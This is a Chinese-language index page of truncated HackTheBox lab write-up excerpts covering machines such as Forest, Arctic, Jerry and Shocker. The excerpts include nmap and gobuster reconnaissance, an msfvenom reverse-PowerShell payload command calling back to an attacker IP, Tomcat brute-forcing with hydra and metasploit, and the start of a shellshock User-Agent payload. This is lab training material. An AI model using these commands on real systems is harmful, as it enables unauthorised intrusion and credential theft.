排序
Forest rpc用户枚举 AS-REP Roasting 域内权限提升
简介ForestDifficulty Easy 实验环境攻击者 Kali 10.10.16.20受害者 IP 10.10.10.161 Windows 1. 信息收集PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerb...
Arctic Juicy Potato提权
拿到了反弹shell之后这种可以用Juciy Potato或者PrintSpoofer提权kali上制作木马msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.16.18 LPORT=3333 > systemreverse.batKali监听333...
Sunday 79端口finger服务用户枚举
简介SundayDifficulty Easy 实验环境攻击者 Kali 10.10.16.16受害者 IP 10.10.10.76 Solaris 1. 信息收集收集受害者服务详情nmap -sC -sV -p- 10.10.10.76 --min-rate 10000 -oA Sunday发现一...
Jerry Tomcat密码爆破和.war木马利用
需要输入用户名和密码 1. 密码爆破爆破方法有两个第一个 metasploitmsfconsole use auxiliary/scanner/http/tomcat_mgr_login show options set RHOSTS 10.10.10.95 run 第二个 hydrahydra -C...
SwagShop Magento漏洞挖掘利用
简介SwagShopDifficulty Easy 实验环境攻击者 Kali 10.10.16.16受害者 IP 10.10.10.140 Linux 1. 信息收集收集受害者服务详情nmap -T5 -n -vvv -oA Irked -noscript 10.10.10.14022 80 端口...
node1 mongodb反弹shell
简介nodeDifficulty Medium 实验环境攻击者 Kali 10.10.16.16受害者 IP 10.10.10.58 Linux 1. 信息收集收集受害者服务详情nmap -sC -sV -p- 10.10.10.58 --min-rate 10000 -oA tartar22和30...
Buff chisel端口转发用于windows
实验环境攻击者 Kali 10.10.14.6受害者 IP 10.10.10.198 LinuxEasy 1. 信息收集8080端口开启我们搜索projectworlds.in gym exploit发现一个RCEhttps://www.exploit-db.com/exploits/48506pytho...
Shocker cgi-bin目录shellshock
前提有cgi-bin 403错误Bash要小于4.3 漏洞找到.sh的文件gobuster dir -u http://10.10.10.185/cgi-bin/ -w /usr/share/dirb/wordlists/common.txt -x .sh找到是user.shUser-Agent: () { :;};...
Magic Magic Bytes Head文件上传绕过 mysqldump
简介MetaDifficulty Medium 实验环境攻击者 Kali 10.10.16.9受害者 IP 10.10.10.185 Linux 1. 信息收集收集受害者服务详情nmap -sV -A 10.10.10.14522 80 开启 gobuster爆破gobuster dir -...
Irked irc服务扫描
简介IrkedDifficulty Easy 实验环境攻击者 Kali 10.10.16.16受害者 IP 10.10.10.117 Linux 1. 信息收集收集受害者服务详情nmap -T5 -n -vvv -oA Irked -noscript 10.10.10.117806697/tcp op...